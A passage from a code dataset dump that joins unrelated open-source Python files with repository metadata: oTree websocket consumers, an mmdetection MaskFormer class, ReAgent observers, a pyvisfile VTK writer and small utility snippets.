return 'room-admin-{}'.format(room)
def post_connect(self, room):
room_object = ROOM_DICT[room]
now = time.time()
stale_threshold = now - 15
present_list = ParticipantRoomVisit.objects.filter(
room_name=room_object.name,
last_updated__gte=stale_threshold,
).values_list('participant_label', flat=True)
# make it JSON serializable
present_list = list(present_list)
self.send({
'status': 'load_participant_lists',
'participants_present': present_list,
})
# prune very old visits -- don't want a resource leak
# because sometimes not getting deleted on WebSocket disconnect
very_stale_threshold = now - 10*60
ParticipantRoomVisit.objects.filter(
room_name=room_object.name,
last_updated__lt=very_stale_threshold,
).delete()
class RoomParticipant(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
room_name, participant_label, tab_unique_id = params.split(',')
return {
'room_name': room_name,
'participant_label': participant_label,
'tab_unique_id': tab_unique_id,
}
def group_name(self, room_name, participant_label, tab_unique_id):
return channel_utils.room_participants_group_name(room_name)
def post_connect(self, room_name, participant_label, tab_unique_id):
if room_name in ROOM_DICT:
room = ROOM_DICT[room_name]
else:
# doesn't get shown because not yet localized
self.send({'error': 'Invalid room name "{}".'.format(room_name)})
return
if room.has_session():
self.send({'status': 'session_ready'})
else:
try:
ParticipantRoomVisit.objects.create(
participant_label=participant_label,
room_name=room_name,
tab_unique_id=tab_unique_id,
last_updated=time.time(),
)
except django.db.IntegrityError:
# possible that the tab connected twice
# without disconnecting in between
# because of WebSocket failure
# tab_unique_id is unique=True,
# so this will throw an integrity error.
# 2017-09-17: I saw the integrityerror on macOS.
# previously, we logged this, but i see no need to do that.
pass
self.group_send(
'room-admin-{}'.format(room_name),
{
'status': 'add_participant',
'participant': participant_label
}
)
def pre_disconnect(self, room_name, participant_label, tab_unique_id):
if room_name in ROOM_DICT:
room = ROOM_DICT[room_name]
else:
# doesn't get shown because not yet localized
self.send({'error': 'Invalid room name "{}".'.format(room_name)})
return
# should use filter instead of get,
# because if the DB is recreated,
# the record could already be deleted
ParticipantRoomVisit.objects.filter(
participant_label=participant_label,
room_name=room_name,
tab_unique_id=tab_unique_id).delete()
if room.has_participant_labels():
if not ParticipantRoomVisit.objects.filter(
participant_label=participant_label,
room_name=room_name
).exists():
# it's ok if there is a race condition --
# in JS removing a participant is idempotent
self.group_send(
'room-admin-{}'.format(room_name),
{
'status': 'remove_participant',
'participant': participant_label
}
)
else:
self.group_send(
'room-admin-{}'.format(room_name),
{
'status': 'remove_participant',
}
)
class BrowserBotsLauncher(OTreeJsonWebsocketConsumer):
def group_name(self, session_code):
return channel_utils.browser_bots_launcher_group(session_code)
class BrowserBot(OTreeJsonWebsocketConsumer):
def group_name(self):
return 'browser_bot_wait'
def post_connect(self):
launcher_session_info = BrowserBotsLauncherSessionCode.objects.first()
if launcher_session_info:
self.send({'status': 'session_ready'})
class ChatConsumer(OTreeJsonWebsocketConsumer):
# Set to True if you want it, else leave it out
strict_ordering = False
def clean_kwargs(self, params):
signer = Signer(sep='/')
try:
original_params = signer.unsign(params)
except BadSignature:
raise InvalidWebSocketParams
channel, participant_id = original_params.split('/')
return {
'channel': channel,
'participant_id': int(participant_id),
}
def group_name(self, channel, participant_id):
return get_chat_group(channel)
def post_connect(self, **kwargs):
history = ChatMessage.objects.filter(
channel=kwargs['channel']).order_by('timestamp').values(
'nickname', 'body', 'participant_id'
)
# Convert ValuesQuerySet to list
self.send(list(history))
def post_receive(self, content, channel, participant_id):
content['channel'] = channel
content['participant_id'] = participant_id
# in the Channels docs, the example has a separate msg_consumer
# channel, so this can be done asynchronously.
# but i think the perf is probably good enough.
# moving into here for simplicity, especially for testing.
nickname_signed = content['nickname_signed']
nickname = Signer().unsign(nickname_signed)
channel = content['channel']
channels_group = get_chat_group(channel)
body = content['body']
participant_id = content['participant_id']
chat_message = {
'nickname': nickname,
'body': body,
'participant_id': participant_id
}
Group(channels_group).send({'text': json.dumps([chat_message])})
ChatMessage.objects.create(
participant_id=participant_id,
channel=channel,
body=body,
nickname=nickname
)
class ExportData(OTreeJsonWebsocketConsumer):
# access to self.message.user for auth
http_user = True
def post_receive(self, content: dict):
'''
if an app name is given, export the app.
otherwise, export all the data (wide).
don't need time_spent or chat yet, they are quick enough
'''
# authenticate
# maybe it should be is_superuser or something else more specific
# but this is to be consistent with the rest of Django's login
if settings.AUTH_LEVEL and not self.message.user.is_authenticated:
logger.warning(
'rejected access to data export through non-authenticated '
'websocket'
)
return
file_extension = content['file_extension']
app_name = content.get('app_name')
if file_extension == 'xlsx':
mime_type = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
IOClass = io.BytesIO
else:
mime_type = 'text/csv'
IOClass = io.StringIO
iso_date = datetime.date.today().isoformat()
with IOClass() as fp:
if app_name:
export_app(app_name, fp, file_extension=file_extension)
file_name_prefix = app_name
else:
export_wide(fp, file_extension=file_extension)
file_name_prefix = 'all_apps_wide'
data = fp.getvalue()
file_name = '{}_{}.{}'.format(
file_name_prefix, iso_date, file_extension)
if file_extension == 'xlsx':
data = base64.b64encode(data).decode('utf-8')
content.update({
'file_name': file_name,
'data': data,
'mime_type': mime_type,
})
self.send(content)
def connection_groups(self, **kwargs):
return []
| [
"chris@otree.org"
] | chris@otree.org |
dfeb1a9ad400d0e5dbfd8aca2f98ca7ed2ab8cf7 | 98cd5ddf45a73aea64bbfac0c0104829d7231b81 | /T - Image + Square/info.py | 28870e30ab938ba5ac04edf47271a06dfd397f12 | [] | no_license | atheis4/ETC_Modes_Extra | 42508d523cfe632a3335e29f6e1e40af91df231b | d0ce221562105382a7a73cc6d280f4ad0eabf6f3 | refs/heads/master | 2022-04-04T11:15:07.335910 | 2020-01-03T20:27:32 | 2020-01-03T20:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | name = "T - Image + Square"
description = "Random Image Placement with Square Border"
knob1 = "Image Size"
knob2 = "Square Size"
knob3 = "Image Opacity"
knob4 = "Square Color"
released = "July 28 2017" | [
"media@critterandguitari.com"
] | media@critterandguitari.com |
80af8a1357d45d62529731511322ff710ddf8c1c | 4d675034878c4b6510e1b45b856cc0a71af7f886 | /mmdet/models/detectors/maskformer.py | df8b5c293c483c5b8791cd24d9e36f564bbe57f9 | [
"Apache-2.0",
"BSD-2-Clause-Views",
"MIT",
"BSD-2-Clause"
] | permissive | shinya7y/UniverseNet | 101ebc2ad8f15482ee45ea8d6561aa338a0fa49e | 3652b18c7ce68122dae7a32670624727d50e0914 | refs/heads/master | 2023-07-22T08:25:42.646911 | 2023-07-08T18:09:34 | 2023-07-08T18:09:34 | 263,555,721 | 407 | 58 | Apache-2.0 | 2023-01-27T01:13:31 | 2020-05-13T07:23:43 | Python | UTF-8 | Python | false | false | 10,396 | py | # Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import numpy as np
from mmdet.core import INSTANCE_OFFSET, bbox2result
from mmdet.core.visualization import imshow_det_bboxes
from ..builder import DETECTORS, build_backbone, build_head, build_neck
from .single_stage import SingleStageDetector
@DETECTORS.register_module()
class MaskFormer(SingleStageDetector):
r"""Implementation of `Per-Pixel Classification is
NOT All You Need for Semantic Segmentation
<https://arxiv.org/pdf/2107.06278>`_."""
def __init__(self,
backbone,
neck=None,
panoptic_head=None,
panoptic_fusion_head=None,
train_cfg=None,
test_cfg=None,
init_cfg=None):
super(SingleStageDetector, self).__init__(init_cfg=init_cfg)
self.backbone = build_backbone(backbone)
if neck is not None:
self.neck = build_neck(neck)
panoptic_head_ = panoptic_head.deepcopy()
panoptic_head_.update(train_cfg=train_cfg)
panoptic_head_.update(test_cfg=test_cfg)
self.panoptic_head = build_head(panoptic_head_)
panoptic_fusion_head_ = panoptic_fusion_head.deepcopy()
panoptic_fusion_head_.update(test_cfg=test_cfg)
self.panoptic_fusion_head = build_head(panoptic_fusion_head_)
self.num_things_classes = self.panoptic_head.num_things_classes
self.num_stuff_classes = self.panoptic_head.num_stuff_classes
self.num_classes = self.panoptic_head.num_classes
self.train_cfg = train_cfg
self.test_cfg = test_cfg
# BaseDetector.show_result default for instance segmentation
if self.num_stuff_classes > 0:
self.show_result = self._show_pan_result
def forward_dummy(self, img, img_metas):
"""Used for computing network flops. See
`mmdetection/tools/analysis_tools/get_flops.py`
Args:
img (Tensor): of shape (N, C, H, W) encoding input images.
Typically these should be mean centered and std scaled.
img_metas (list[Dict]): list of image info dict where each dict
has: 'img_shape', 'scale_factor', 'flip', and may also contain
'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'.
For details on the values of these keys see
`mmdet/datasets/pipelines/formatting.py:Collect`.
"""
super(SingleStageDetector, self).forward_train(img, img_metas)
x = self.extract_feat(img)
outs = self.panoptic_head(x, img_metas)
return outs
def forward_train(self,
img,
img_metas,
gt_bboxes,
gt_labels,
gt_masks,
gt_semantic_seg=None,
gt_bboxes_ignore=None,
**kargs):
"""
Args:
img (Tensor): of shape (N, C, H, W) encoding input images.
Typically these should be mean centered and std scaled.
img_metas (list[Dict]): list of image info dict where each dict
has: 'img_shape', 'scale_factor', 'flip', and may also contain
'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'.
For details on the values of these keys see
`mmdet/datasets/pipelines/formatting.py:Collect`.
gt_bboxes (list[Tensor]): Ground truth bboxes for each image with
shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format.
gt_labels (list[Tensor]): class indices corresponding to each box.
gt_masks (list[BitmapMasks]): true segmentation masks for each box
used if the architecture supports a segmentation task.
gt_semantic_seg (list[tensor]): semantic segmentation mask for
images for panoptic segmentation.
Defaults to None for instance segmentation.
gt_bboxes_ignore (list[Tensor]): specify which bounding
boxes can be ignored when computing the loss.
Defaults to None.
Returns:
dict[str, Tensor]: a dictionary of loss components
"""
# add batch_input_shape in img_metas
super(SingleStageDetector, self).forward_train(img, img_metas)
x = self.extract_feat(img)
losses = self.panoptic_head.forward_train(x, img_metas, gt_bboxes,
gt_labels, gt_masks,
gt_semantic_seg,
gt_bboxes_ignore)
return losses
def simple_test(self, imgs, img_metas, **kwargs):
"""Test without augmentation.
Args:
imgs (Tensor): A batch of images.
img_metas (list[dict]): List of image information.
Returns:
list[dict[str, np.array | tuple[list]] | tuple[list]]:
Semantic segmentation results and panoptic segmentation \
results of each image for panoptic segmentation, or formatted \
bbox and mask results of each image for instance segmentation.
.. code-block:: none
[
# panoptic segmentation
{
'pan_results': np.array, # shape = [h, w]
'ins_results': tuple[list],
# semantic segmentation results are not supported yet
'sem_results': np.array
},
...
]
or
.. code-block:: none
[
# instance segmentation
(
bboxes, # list[np.array]
masks # list[list[np.array]]
),
...
]
"""
feats = self.extract_feat(imgs)
mask_cls_results, mask_pred_results = self.panoptic_head.simple_test(
feats, img_metas, **kwargs)
results = self.panoptic_fusion_head.simple_test(
mask_cls_results, mask_pred_results, img_metas, **kwargs)
for i in range(len(results)):
if 'pan_results' in results[i]:
results[i]['pan_results'] = results[i]['pan_results'].detach(
).cpu().numpy()
if 'ins_results' in results[i]:
labels_per_image, bboxes, mask_pred_binary = results[i][
'ins_results']
bbox_results = bbox2result(bboxes, labels_per_image,
self.num_things_classes)
mask_results = [[] for _ in range(self.num_things_classes)]
for j, label in enumerate(labels_per_image):
mask = mask_pred_binary[j].detach().cpu().numpy()
mask_results[label].append(mask)
results[i]['ins_results'] = bbox_results, mask_results
assert 'sem_results' not in results[i], 'segmantic segmentation '\
'results are not supported yet.'
if self.num_stuff_classes == 0:
results = [res['ins_results'] for res in results]
return results
def aug_test(self, imgs, img_metas, **kwargs):
raise NotImplementedError
def onnx_export(self, img, img_metas):
raise NotImplementedError
def _show_pan_result(self,
img,
result,
score_thr=0.3,
bbox_color=(72, 101, 241),
text_color=(72, 101, 241),
mask_color=None,
thickness=2,
font_size=13,
win_name='',
show=False,
wait_time=0,
out_file=None):
"""Draw `panoptic result` over `img`.
Args:
img (str or Tensor): The image to be displayed.
result (dict): The results.
score_thr (float, optional): Minimum score of bboxes to be shown.
Default: 0.3.
bbox_color (str or tuple(int) or :obj:`Color`):Color of bbox lines.
The tuple of color should be in BGR order. Default: 'green'.
text_color (str or tuple(int) or :obj:`Color`):Color of texts.
The tuple of color should be in BGR order. Default: 'green'.
mask_color (None or str or tuple(int) or :obj:`Color`):
Color of masks. The tuple of color should be in BGR order.
Default: None.
thickness (int): Thickness of lines. Default: 2.
font_size (int): Font size of texts. Default: 13.
win_name (str): The window name. Default: ''.
wait_time (float): Value of waitKey param.
Default: 0.
show (bool): Whether to show the image.
Default: False.
out_file (str or None): The filename to write the image.
Default: None.
Returns:
img (Tensor): Only if not `show` or `out_file`.
"""
img = mmcv.imread(img)
img = img.copy()
pan_results = result['pan_results']
# keep objects ahead
ids = np.unique(pan_results)[::-1]
legal_indices = ids != self.num_classes # for VOID label
ids = ids[legal_indices]
labels = np.array([id % INSTANCE_OFFSET for id in ids], dtype=np.int64)
segms = (pan_results[None] == ids[:, None, None])
# if out_file specified, do not show image in window
if out_file is not None:
show = False
# draw bounding boxes
img = imshow_det_bboxes(
img,
segms=segms,
labels=labels,
class_names=self.CLASSES,
bbox_color=bbox_color,
text_color=text_color,
mask_color=mask_color,
thickness=thickness,
font_size=font_size,
win_name=win_name,
show=show,
wait_time=wait_time,
out_file=out_file)
if not (show or out_file):
return img
| [
"noreply@github.com"
] | shinya7y.noreply@github.com |
78120becb61c39d95665cd156269b2bb021e6dca | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/580747_Two_quick_functions_object/recipe-580747.py | 537650eed6cc4cbf663fde4bce6deec57d9c17c5 | [
"MIT",
"BSD-2-Clause"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 2,535 | py | def oa(o):
for at in dir(o):
print at,
'''
Sample calls and output for oa() below:
# object attributes of a dict:
oa({})
__class__ __cmp__ __contains__ __delattr__ __delitem__ __doc__ __eq__ __format__
__ge__ __getattribute__ __getitem__ __gt__ __hash__ __init__ __iter__ __le__ __len__
__lt__ __ne__ __new__ __reduce__ __reduce_ex__ __repr__ __setattr__ __setitem__
__sizeof__ __str__ __subclasshook__ clear copy fromkeys get has_key items
iteritems iterkeys itervalues keys pop popitem setdefault update values viewitems
viewkeys viewvalues
# object attributes of a list:
oa([])
__add__ __class__ __contains__ __delattr__ __delitem__ __delslice__ __doc__ __eq__
__format__ __ge__ __getattribute__ __getitem__ __getslice__ __gt__ __hash__ __iadd__
__imul__ __init__ __iter__ __le__ __len__ __lt__ __mul__ __ne__ __new__
__reduce__ __reduce_ex__ __repr__ __reversed__ __rmul__ __setattr__ __setitem__
__setslice__ __sizeof__ __str__ __subclasshook__ append count extend index insert
pop remove reverse sort
# object attributes of an int:
oa(1)
__abs__ __add__ __and__ __class__ __cmp__ __coerce__ __delattr__ __div__ __divmod__
__doc__ __float__ __floordiv__ __format__ __getattribute__ __getnewargs__ __hash__
__hex__ __index__ __init__ __int__ __invert__ __long__ __lshift__ __mod__
__mul__ __neg__ __new__ __nonzero__ __oct__ __or__ __pos__ __pow__ __radd__ __rand__
__rdiv__ __rdivmod__ __reduce__ __reduce_ex__ __repr__ __rfloordiv__ __rlshift__
__rmod__ __rmul__ __ror__ __rpow__ __rrshift__ __rshift__ __rsub__ __rtruediv__
__rxor__ __setattr__ __sizeof__ __str__ __sub__ __subclasshook__ __truediv__
__trunc__ __xor__ bit_length conjugate denominator imag numerator real
'''
def oar(o):
for at in dir(o):
if not at.startswith('__') and not at.endswith('__'):
print at,
'''
# regular (meaning non-dunder) object attributes of a dict:
oar({})
clear copy fromkeys get has_key items iteritems iterkeys itervalues keys pop popitem
setdefault update values viewitems viewkeys viewvalues
# regular object attributes of an int:
oar(1)
bit_length conjugate denominator imag numerator real
# regular object attributes of a string:
oar('')
_formatter_field_name_split _formatter_parser capitalize center count decode encode
endswith expandtabs find format index isalnum isalpha isdigit islower isspace
istitle isupper join ljust lower lstrip partition replace rfind rindex rjust rpartition
rsplit rstrip split splitlines startswith strip swapcase title translate upper zfil
'''
| [
"betty@qburst.com"
] | betty@qburst.com |
117fe1342a3efe8540e633aa9a62d928ac69653d | 8d9318a33afc2c3b5ca8ac99fce0d8544478c94a | /Books/Casandra DB/DataStax/resources/spark/python/examples/wordcount.py | 52f53c6f8b231953db69166e09e3ccc8a4d5cd1c | [] | no_license | tushar239/git-large-repo | e30aa7b1894454bf00546312a3fb595f6dad0ed6 | 9ee51112596e5fc3a7ab2ea97a86ec6adc677162 | refs/heads/master | 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:ca373d7911f67e869369ad2f602e2739ff048b81941c922a74136867cf33a91d
size 1321
| [
"tushar239@gmail.com"
] | tushar239@gmail.com |
1c7e5a7390304c57008517d71539568ca946b451 | 0580861bd8b993ac92faec0ed88a339975d702c0 | /reagent/core/observers.py | 8d56984ae533afe510457644890fada46dbd303f | [
"BSD-3-Clause"
] | permissive | Sandy4321/ReAgent | 346094ae4c98121de5c54d504186f583de21daf0 | 0a387c1aeb922d242c705338fae9379becc82814 | refs/heads/master | 2023-07-17T01:27:17.762206 | 2021-08-19T03:15:15 | 2021-08-19T03:17:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
from typing import Any, Dict, Iterable, List, Optional
from reagent.core.tensorboardX import SummaryWriterContext
from reagent.core.tracker import Aggregator, Observer
logger = logging.getLogger(__name__)
class CompositeObserver(Observer):
"""
A composite observer which takes care of dispatching values to child observers
"""
def __init__(self, observers: Iterable[Observer]):
self.observers: Dict[str, List[Observer]] = {}
for observer in observers:
observing_keys = observer.get_observing_keys()
for key in observing_keys:
self.observers.setdefault(key, []).append(observer)
super().__init__(list(self.observers))
def update(self, key: str, value):
for observer in self.observers[key]:
observer.update(key, value)
class EpochEndObserver(Observer):
"""
Call the callback function with epoch # when the epoch ends
"""
def __init__(self, callback, key: str = "epoch_end"):
super().__init__(observing_keys=[key])
self.callback = callback
def update(self, key: str, value):
self.callback(value)
class ValueListObserver(Observer):
"""
Simple observer that collect values into a list
"""
def __init__(self, observing_key: str):
super().__init__(observing_keys=[observing_key])
self.observing_key = observing_key
self.values: List[Any] = []
def update(self, key: str, value):
self.values.append(value)
def reset(self):
self.values = []
class TensorBoardScalarObserver(Observer):
def __init__(self, key: str, logging_key: Optional[str]):
super().__init__(observing_keys=[key])
self.key = key
self.logging_key = logging_key or key
def update(self, key: str, value):
SummaryWriterContext.add_scalar(self.logging_key, value)
class IntervalAggregatingObserver(Observer):
def __init__(
self,
interval: Optional[int],
aggregator: Aggregator,
observe_epoch_end: bool = True,
):
self.key = aggregator.key
obs_keys = ["epoch_end"] if observe_epoch_end else []
obs_keys.append(self.key)
super().__init__(observing_keys=obs_keys)
self.iteration = 0
self.interval = interval
self.intermediate_values: List[Any] = []
self.aggregator = aggregator
def update(self, key: str, value):
if key == "epoch_end":
self.flush()
return
self.intermediate_values.append(value)
self.iteration += 1
# pyre-fixme[58]: `%` is not supported for operand types `int` and
# `Optional[int]`.
if self.interval and self.iteration % self.interval == 0:
logger.info(
"Aggregating values over the recent interval for %s at iteration %s; aggregator: %s",
self.key,
self.iteration,
self.aggregator.__class__.__name__,
)
self.aggregator(self.key, self.intermediate_values)
self.intermediate_values = []
def flush(self):
# We need to reset iteration here to avoid aggregating on the same data multiple
# times
logger.info(
f"Interval Agg. Flushing: {self.key}; iteration: {self.iteration}; "
f"aggregator: {self.aggregator.__class__.__name__}; points: {len(self.intermediate_values)}"
)
self.iteration = 0
if self.intermediate_values:
self.aggregator(self.key, self.intermediate_values)
self.intermediate_values = []
self.aggregator.flush()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
a2d865f534068e41894553b999aeceab60ce73c0 | 6d54c57d0ec958158b48be3aa46fe717b507d378 | /pyvisfile/vtk/__init__.py | 589fd52966ef9af146a413614df3eef7806a8b5b | [
"MIT"
] | permissive | cstatz/pyvisfile | e368a82caaec495a5fbfbc2d45b9d773427f0e49 | a724f77da5cd46842f0ba313ac0ba1f86f3842c5 | refs/heads/master | 2021-01-18T11:17:40.212432 | 2013-08-29T10:29:42 | 2013-08-29T10:29:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,175 | py | """Generic support for new-style (XML) VTK visualization data files."""
__copyright__ = "Copyright (C) 2007 Andreas Kloeckner"
import numpy as np
VTK_INT8 = "Int8"
VTK_UINT8 = "UInt8"
VTK_INT16 = "Int16"
VTK_UINT16 = "UInt16"
VTK_INT32 = "Int32"
VTK_UINT32 = "UInt32"
VTK_INT64 = "Int64"
VTK_UINT64 = "UInt64"
VTK_FLOAT32 = "Float32"
VTK_FLOAT64 = "Float64"
VTK_VERTEX = 1
VTK_POLY_VERTEX = 2
VTK_LINE = 3
VTK_POLY_LINE = 4
VTK_TRIANGLE = 5
VTK_TRIANGLE_STRIP = 6
VTK_POLYGON = 7
VTK_PIXEL = 8
VTK_QUAD = 9
VTK_TETRA = 10
VTK_VOXEL = 11
VTK_HEXAHEDRON = 12
VTK_WEDGE = 13
VTK_PYRAMID = 14
CELL_NODE_COUNT = {
VTK_VERTEX: 1,
# VTK_POLY_VERTEX: no a-priori size
VTK_LINE: 2,
# VTK_POLY_LINE: no a-priori size
VTK_TRIANGLE: 3,
# VTK_TRIANGLE_STRIP: no a-priori size
# VTK_POLYGON: no a-priori size
VTK_PIXEL: 4,
VTK_QUAD: 4,
VTK_TETRA: 4,
VTK_VOXEL: 8,
VTK_HEXAHEDRON: 8,
VTK_WEDGE: 6,
VTK_PYRAMID: 5,
}
VF_LIST_OF_COMPONENTS = 0 # [[x0,y0,z0], [x1,y1,z1]
VF_LIST_OF_VECTORS = 1 # [[x0,x1], [y0,y1], [z0,z1]]
_U32CHAR = np.dtype(np.uint32).char
# Ah, the joys of home-baked non-compliant XML goodness.
class XMLElementBase(object):
def __init__(self):
self.children = []
def copy(self, new_children=None):
result = self.__class__(self.tag, self.attributes)
if new_children is not None:
result.children = new_children
else:
result.children = self.children
return result
def add_child(self, child):
self.children.append(child)
class XMLElement(XMLElementBase):
def __init__(self, tag, **attributes):
XMLElementBase.__init__(self)
self.tag = tag
self.attributes = attributes
def write(self, file):
attr_string = "".join(
" %s=\"%s\"" % (key,value)
for key,value in self.attributes.iteritems())
if self.children:
file.write("<%s%s>\n" % (self.tag, attr_string))
for child in self.children:
if isinstance(child, XMLElement):
child.write(file)
else:
# likely a string instance, write it directly
file.write(child)
file.write("</%s>\n" % self.tag)
else:
file.write("<%s%s/>\n" % (self.tag, attr_string))
class XMLRoot(XMLElementBase):
def __init__(self, child=None):
XMLElementBase.__init__(self)
if child:
self.add_child(child)
def write(self, file):
file.write("<?xml version=\"1.0\"?>\n")
for child in self.children:
if isinstance(child, XMLElement):
child.write(file)
else:
# likely a string instance, write it directly
file.write(child)
class EncodedBuffer:
def encoder(self):
"""Return an identifier for the binary encoding used."""
raise NotImplementedError
def compressor(self):
"""Return an identifier for the compressor used, or None."""
raise NotImplementedError
def raw_buffer(self):
"""Reobtain the raw buffer string object that was used to
construct this encoded buffer."""
raise NotImplementedError
def add_to_xml_element(self, xml_element):
"""Add encoded buffer to the given *xml_element*
Return total size of encoded buffer in bytes."""
raise NotImplementedError
class BinaryEncodedBuffer:
def __init__(self, buffer):
self.buffer = buffer
def encoder(self):
return "binary"
def compressor(self):
return None
def raw_buffer(self):
return self.buffer
def add_to_xml_element(self, xml_element):
raise NotImplementedError
class Base64EncodedBuffer:
def __init__(self, buffer):
from struct import pack
from base64 import b64encode
self.b64header = b64encode(
pack(_U32CHAR, len(buffer)))
self.b64data = b64encode(buffer)
def encoder(self):
return "base64"
def compressor(self):
return None
def raw_buffer(self):
from base64 import b64decode
return b64decode(self.b64data)
def add_to_xml_element(self, xml_element):
"""Add encoded buffer to the given *xml_element*.
Return total size of encoded buffer in bytes."""
xml_element.add_child(self.b64header)
xml_element.add_child(self.b64data)
return len(self.b64header) + len(self.b64data)
class Base64ZLibEncodedBuffer:
def __init__(self, buffer):
from struct import pack
from base64 import b64encode
from zlib import compress
comp_buffer = compress(buffer)
comp_header = [1, len(buffer), len(buffer), len(comp_buffer)]
self.b64header = b64encode(
pack(_U32CHAR*len(comp_header), *comp_header))
self.b64data = b64encode(comp_buffer)
def encoder(self):
return "base64"
def compressor(self):
return "zlib"
def raw_buffer(self):
from base64 import b64decode
from zlib import decompress
return decompress(b64decode(self.b64data))
def add_to_xml_element(self, xml_element):
"""Add encoded buffer to the given *xml_element*.
Return total size of encoded buffer in bytes."""
xml_element.add_child(self.b64header)
xml_element.add_child(self.b64data)
return len(self.b64header) + len(self.b64data)
class DataArray(object):
def __init__(self, name, container, vector_padding=3,
vector_format=VF_LIST_OF_COMPONENTS, components=None):
self.name = name
if isinstance(container, DataArray):
self.type = container.type
self.components = container.components
self.encoded_buffer = container.encoded_buffer
return
def vec_type(vec):
if vec.dtype == np.int8: return VTK_INT8
elif vec.dtype == np.uint8: return VTK_UINT8
elif vec.dtype == np.int16: return VTK_INT16
elif vec.dtype == np.uint16: return VTK_UINT16
elif vec.dtype == np.int32: return VTK_INT32
elif vec.dtype == np.uint32: return VTK_UINT32
elif vec.dtype == np.int64: return VTK_INT64
elif vec.dtype == np.uint64: return VTK_UINT64
elif vec.dtype == np.float32: return VTK_FLOAT32
elif vec.dtype == np.float64: return VTK_FLOAT64
else:
raise TypeError, "Unsupported vector type '%s' in VTK writer" % (vec.dtype)
if not isinstance(container, np.ndarray):
raise ValueError, "cannot convert object of type `%s' to DataArray" % type(container)
if not isinstance(container, np.ndarray):
raise TypeError("expected numpy array, got '%s' instead"
% type(container))
if container.dtype == object:
for subvec in container:
if not isinstance(subvec, np.ndarray):
raise TypeError("expected numpy array, got '%s' instead"
% type(subvec))
container = np.array(list(container))
assert container.dtype != object
if len(container.shape) > 1:
if vector_format == VF_LIST_OF_COMPONENTS:
container = container.T.copy()
assert len(container.shape) == 2, "numpy vectors of rank >2 are not supported"
assert container.strides[1] == container.itemsize, "2D numpy arrays must be row-major"
if vector_padding > container.shape[1]:
container = np.asarray(np.hstack((
container,
np.zeros((
container.shape[0],
vector_padding-container.shape[1],
),
container.dtype))), order="C")
self.components = container.shape[1]
else:
self.components = 1
self.type = vec_type(container)
if not container.flags.c_contiguous:
container = container.copy()
buf = buffer(container)
self.encoded_buffer = BinaryEncodedBuffer(buf)
def get_encoded_buffer(self, encoder, compressor):
have_encoder = self.encoded_buffer.encoder()
have_compressor = self.encoded_buffer.compressor()
if (encoder, compressor) != (have_encoder, have_compressor):
raw_buf = self.encoded_buffer.raw_buffer()
# avoid having three copies of the buffer around temporarily
del self.encoded_buffer
if (encoder, compressor) == ("binary", None):
self.encoded_buffer = BinaryEncodedBuffer(raw_buf)
elif (encoder, compressor) == ("base64", None):
self.encoded_buffer = Base64EncodedBuffer(raw_buf)
elif (encoder, compressor) == ("base64", "zlib"):
self.encoded_buffer = Base64ZLibEncodedBuffer(raw_buf)
else:
self.encoded_buffer = BinaryEncodedBuffer(raw_buf)
raise ValueError("invalid encoder/compressor pair")
have_encoder = self.encoded_buffer.encoder()
have_compressor = self.encoded_buffer.compressor()
assert (encoder, compressor) == (have_encoder, have_compressor)
return self.encoded_buffer
def encode(self, compressor, xml_element):
ebuf = self.get_encoded_buffer("base64", compressor)
return ebuf.add_to_xml_element(xml_element)
def invoke_visitor(self, visitor):
return visitor.gen_data_array(self)
class UnstructuredGrid(object):
def __init__(self, points, cells, cell_types):
self.point_count = len(points)
self.cell_count = len(cells)
self.point_count, self.points = points
assert self.points.name == "points"
try:
self.cell_count, self.cell_connectivity, \
self.cell_offsets = cells
except:
self.cell_count = len(cell_types)
offsets = np.cumsum(np.fromiter(
(CELL_NODE_COUNT[ct] for ct in cell_types),
dtype=np.int,
count=len(cell_types)))
self.cell_connectivity = DataArray("connectivity", cells)
self.cell_offsets = DataArray("offsets", offsets)
self.cell_types = DataArray("types", cell_types)
self.pointdata = []
self.celldata = []
def copy(self):
return UnstructuredGrid(
(self.point_count, self.points),
(self.cell_count, self.cell_connectivity,
self.cell_offsets),
self.cell_types)
def vtk_extension(self):
return "vtu"
def invoke_visitor(self, visitor):
return visitor.gen_unstructured_grid(self)
def add_pointdata(self, data_array):
self.pointdata.append(data_array)
def add_celldata(self, data_array):
self.celldata.append(data_array)
class StructuredGrid(object):
def __init__(self, mesh):
self.mesh = mesh
if mesh.shape[0] != 3:
raise ValueError("Mesh must consist of three-dimensional points")
self.shape = mesh.shape[1:]
self.points = DataArray(
"points", mesh.T.copy().reshape(-1, 3),
vector_format=VF_LIST_OF_VECTORS)
self.pointdata = []
self.celldata = []
def copy(self):
return StructuredGrid(self.mesh)
def vtk_extension(self):
return "vts"
def invoke_visitor(self, visitor):
return visitor.gen_structured_grid(self)
def add_pointdata(self, data_array):
self.pointdata.append(data_array)
def add_celldata(self, data_array):
self.celldata.append(data_array)
def make_vtkfile(filetype, compressor):
import sys
if sys.byteorder == "little":
bo = "LittleEndian"
else:
bo = "BigEndian"
kwargs = {}
if compressor == "zlib":
kwargs["compressor"] = "vtkZLibDataCompressor"
return XMLElement("VTKFile", type=filetype, version="0.1", byte_order=bo, **kwargs)
class XMLGenerator(object):
def __init__(self, compressor=None):
if compressor == "zlib":
try:
import zlib
except ImportError:
compress = False
